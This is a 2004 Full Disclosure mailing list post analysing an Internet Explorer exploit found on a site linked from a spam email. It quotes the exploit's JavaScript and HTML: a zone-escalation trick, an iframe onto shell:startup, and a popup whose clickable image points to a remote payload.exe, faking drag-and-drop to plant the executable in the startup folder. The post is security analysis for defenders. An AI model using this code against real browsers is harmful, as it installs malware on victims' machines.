Full Disclosure mailing list archives
Re: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!]
From: Alla Bezroutchko <alla () scanit be>
Date: Tue, 07 Sep 2004 16:10:18 +0200
Martin Stricker wrote:
I just got attached e-mail. On the linked website I found this exploit code (sorry for the line breaks):
As far as I can figure out it is a combination of two unpatched vulnerabilities. First it uses method assignement vulnerability (discovered by Paul (at) greyhats cjb net - see http://www.securityfocus.com/archive/1/368671) to get into Local Computer zone:
function govuln(){
var w=window.open("javascript:wait for parent to change domain and
then call location.assign with a javascript url");
w.location.assign=location.assign;
location.href="http://localhost";;
}
Once in local computer zone it does what I believe is a variation of
drag and drop file installation vulnerability discovered by http-equiv.
The interesting twist is that instead of tricking the user into
dragging and dropping something (as mikx demonstrated at
http://www.mikx.de/scrollbar/) they get the user to click on an image
and then pull the window with the image from under the mouse to emulate
drag and drop.
First they create an iframe with shell:startup folder.<iframe src=shell:startup HEIGHT=5000; WIDTH=5000 style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;>
</iframe>Then they open a popup window that covers the whole screen and shows an image 1.gif using styles. The src of the image points to the payload executable. The image is an animated gif that first shows a counter and then says "Click to enter".
<body onload=showpop()>
<script>
function showpop(){
pop=window.createPopup();
pop.document.body.style.margin=0;
pop.document.body.innerHTML=txt.value;
pop.show(100,100,screen.width+300,screen.height+300);
}
</script>
<span style=position: absolute; left: 1; top: 1 id=absspan>
</span>
<textarea id=txt rows=1 cols=20 style=display:none>
<html><body><table width=100% height=100%><tr ALIGN=LEFT
VALIGN=TOP><br><center><img src=http://removed/payload.exe id=anch
onmousedown=parent.pop.show(1,1,1,1);
style=width=4000px;height=4000px;background-image:url('http://removed/1.gif');></a></td></tr></table>
</textarea>
</body>
When the user clicks on the image, the underlying popup window is moved
by calling parent.pop.show(1,1,1,1) . So the image is effectively
dragged into shell:startup, and the excutable is installed in the
startup folder. This technique (pull the window from under the mouse to
emulate drag and drop) AFAIK was first shown by Liu Die Yu in
HijackClick
(http://umbrella.name/originalvuln/msie/HijackClick/HijackClick-Content.HTM)
Another trick that they use is to download the payload executable first, using XmlHTTP object. I think this is to get it cached, and make the whole exploit more reliable.
Also interesting that they don't use
"a {behavior:url(#default#AnchorClick);}"
in this exploit which seems to be an essential part of http-equiv's and
mikx's exploits.
Alla. -- Scanit Belgium Browser Security Test - http://bcheck.scanit.be/bcheck/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!] Martin Stricker (Sep 07)
- Re: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!] Alla Bezroutchko (Sep 07)
- <Possible follow-ups>
- Re: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!] http-equiv () excite com (Sep 09)